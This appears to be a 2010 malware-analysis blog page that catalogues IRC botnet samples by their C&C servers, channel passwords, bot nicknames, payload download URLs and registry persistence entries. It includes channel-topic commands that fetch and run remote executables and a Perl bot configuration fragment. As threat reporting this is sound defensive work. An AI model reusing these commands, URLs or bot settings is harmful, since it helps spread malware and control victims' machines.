Month: September 2010

Remote Host Port Number 220.229.232.69 4891 USER fyejoxvc fyejoxvc fyejoxvc :morggdnd NICK FNaVaqaVE MODE FNaVaqaVE +xi JOIN #maxi USERHOST FNaVaqaVE MODE #maxi +smntu Now talking in #maxi Topic On: [ #maxi ] [ =glRW7E+NAInKAWQQ9QNpMjm2/81PJzDl0ggaCl8I9h9tSzyjtM4cn6mC9aL1JrmzdqVs5/a9kXPXyRkv7CNtD6uKgjNKvUDhzc7e7bNqdGGL+T/DDRuqVsdOVnWpBdDPucbFYwN/AJyLkrYs9h6fLKN6q3x ] Topic By: [ DIKFK ] Modes On: [ #maxi ] [ +smntSMCu ]

DNS Lookup Host Name IP Address Established.yi.org 87.236.232.25 Established.yi.org mue-88-130-14-018.dsl.tropolys.de 88.130.14.18 mue-88-130-14-018.dsl.tropolys.de whatismyip.akamai.com 212.201.100.185 whatismyip.akamai.com Driver.yi.org 91.93.117.180 Driver.yi.org Opened listening TCP connection on port: 113Download URLs http://212.201.100.169/ (212.201.100.169) http://91.93.117.180/run.exe (Driver.yi.org) C&C Server: 87.236.232.25:6667 Server Password: Username: t7d4z2 Nickname: :V|XP|G7Zd1 Channel: #Establish (Password: fuckyouall) Channeltopic: Outgoing connection to remote server: 212.201.100.169 TCP port 80 Outgoing connectionRead more...

Remote Host Port Number 204.0.5.41 80 204.0.5.42 80 204.0.5.48 80 204.0.5.56 80 207.38.101.10 80 207.38.101.12 80 216.178.38.103 80 216.178.38.168 80 63.135.86.21 80 63.135.86.25 80 205.234.231.194 1234 PASS xxx NICK NEW-[USA|00|P|36443] USER XP-9032 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|36443] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

Remote Host Port Number 174.120.205.250 81 NICK n[USA|XP]0115398 USER s “” “lol” :s JOIN #newbin# PONG 422 JOIN #USA (null) The following port was open in the system: Port Protocol Process 1055 TCP msnd.exe (%AppData%msnd.exe) Registry Modifications The newly created Registry Value is: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] Windows System Guard = “%AppData%msnd.exe” so that msnd.exe runs every timeRead more...

windows-pc-defender.com     208.73.210.48 1-microsoft.com     208.73.210.48 b0nkerz.com     208.73.210.48 UDP Connections Remote IP Address: 208.73.210.48 Port: 7006 Send Datagram: packet(s) of size 7 Recv Datagram: 1862 packet(s) of size 0 Remote IP Address: 208.73.210.48 Port: 7006 Send Datagram: packet(s) of size 7 Recv Datagram: 1825 packet(s) of size 0 Remote IP Address: 208.73.210.48 Port: 7006Read more...

Current Local Users: 12 Max: 602Current Global Users: 127 Max: 1021 my $server    = “staff.racrew.info”; my $port    = “7878”; my $nick    = “no”.(int(rand(99))); my $chan    = “#scan”; my $admin    = “PLaTo”; other chans #dor #scan #racrew

Server DNS ….: dalga.co.cc Server IP ……: 109.169.18.25 Server Port…..6667 Nick …………: [AUT|00|P|07591] Username ….: XP-9485 Server Pass ..: xxx Joined Channel …: #die

vs.barmy-army.net     203.141.249.71 0     127.0.0.1 www.nodrugs.kz     www.nodrugs.kz     80.92.200.94 UDP Connections Remote IP Address: 127.0.0.1 Port: 1096 Send Datagram: 93 packet(s) of size 1 Recv Datagram: 93 packet(s) of size 1 Download URLs http://80.92.200.94/images/ms.exe (www.nodrugs.kz) C&C Server: 203.141.249.71:9595 Server Password: Username: VirUs Nickname: {NOVY}[DEU][XP-SP3]393457 Channel: #Us-D33# (Password: jessica) Channeltopic: :!NAZEL http://www.nodrugs.kz/images/ms.exe ddsds.exe 1Read more...

Botnet C&C irc wintalk.are.lamahs.co.cc DNS_TYPE_A 178.32.18.248 wintalk.are.lamahs.co.cc:8080 Nick: [LN]AUS|XP|SP3|9689[00] Username: XP-4027 Joined Channel: #`ntcity`# with Password loltarded Channel Topic for Channel #`ntcity`#: “+take http://richardg.fileave.com/noeabx.bat C:WINDOWSTempsystem.bat 1” Private Message to Channel #`ntcity`#: “Leech../ File download: 0.4KB to: C:WINDOWSTempsystem.bat @ 0.4KB/sec.” Private Message to Channel #`ntcity`#: “Leech../ Created process: “C:WINDOWSTempsystem.bat”, PID: <1808>” Process Created C:WINDOWSmsshell.exe

Botnet C&C irc kuwait.arabgroup.org ip: 204.188.240.50 kuwait.arabgroup.org:5900 User Name: xrhushl Real Name: HOME-OFF-D5F0AC Nick Name: USA|XP|HOME-OFF-D5F0AC|347089 Channel: #j0ez# Channel: #w0rm# Process Created C:Documents and SettingsDaveApplication Datajuschew.exe